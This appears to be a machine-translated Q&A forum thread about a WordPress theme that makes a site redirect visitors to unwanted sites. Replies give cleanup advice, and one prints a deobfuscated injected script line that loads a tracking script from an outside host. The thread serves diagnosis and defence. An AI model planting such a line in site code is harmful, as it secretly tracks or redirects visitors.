美好的一天
我刚刚将一个Wordpress主题上传到我的网站Web服务器。现在我在我的家庭服务器上测试了这个主题,没有任何问题。
由于它已经在网络服务器上(在一家值得信赖的托管公司),当我浏览我的网站时,我会将网址重定向到恶意网站。 (我从来没有向任何人提供任何帐户详细信息,帐户只有一周的时间)
这是我的网站:http://evolutionof4.co.za
它链接到的恶意网站是:themeforest.net,carolini.net等。
我已经在网络服务器上扫描了我的所有文件以查找恶意软件(使用avast),我还使用Sucuri Security扫描了我的网站,但它没有接收任何内容。
我不认为它是我的PC上的恶意软件,因为我从我的局域网上的另一台PC遇到同样的问题...
有帮助吗?
谢谢
我有同样的问题,我解决了,通过手动检查,根目录下的所有文件,意味着那些带有wordpress并放在root,wp-config,wp-settings等中的文件,在那里我发现文件中有一些麻烦的脚本表示加密的代码。我删除了它。然后检查我的footer.php这里还有2,3行恶意代码。我删除它,然后我再次检查问题是谷歌显示它是恶意网站,然后我在谷歌搜索它,并发现删除此类代码后,你应该提交您的网站在谷歌的网站管理员工具后审查我收回邮件的那一天。
检查更改ftp和wp-admin的用户名和密码后,检查文件,
最重要的是在网站站长工具上提交评论
检查主题文件夹中的functions.php。它发生在我身上,重定向到jqueryc.com ...
您的管理员凭据访问该网站的强度有多大?如果它们相对较弱,攻击者就可以猜出你的凭据。也可能存在主机服务器的DNS中毒 - 他们必须解决的问题。如果您输入您的网址并加载您的网站然后加载恶意网站,那么这不是可能的原因。
另外,请查看可能由恶意网站/内容加载的攻击者添加的iFrame的站点代码。这些不需要服务器上的恶意软件,只需要一行或两行HTML代码。
可能是,新主题包含垃圾?也许,有一些东西需要配置。但是,我永远不会尝试修复受感染的网站,只需恢复所有文件和数据库的备份。然后,您可以尝试通过再次上传该主题来重现所有这些,同时准备好备份。主题可能不仅仅包含一些样式定义。当然,如果有疑问,建议更改凭据。
我使用了jsunpack并对其进行了反混淆处理:
//document.write (s) <script type="text/javascript" src="http://themenest.net/platform/script/track?d=undefined&r=undefined&c=905"></script>
你可以自己看看permanent report。这看起来像是一个跟踪错误和用户的隐私问题。我将其删除,并且可能不会再使用该网站的任何主题。
选择所有文件。并删除它......
然后再次上传你的文件..希望这也可以正常工作..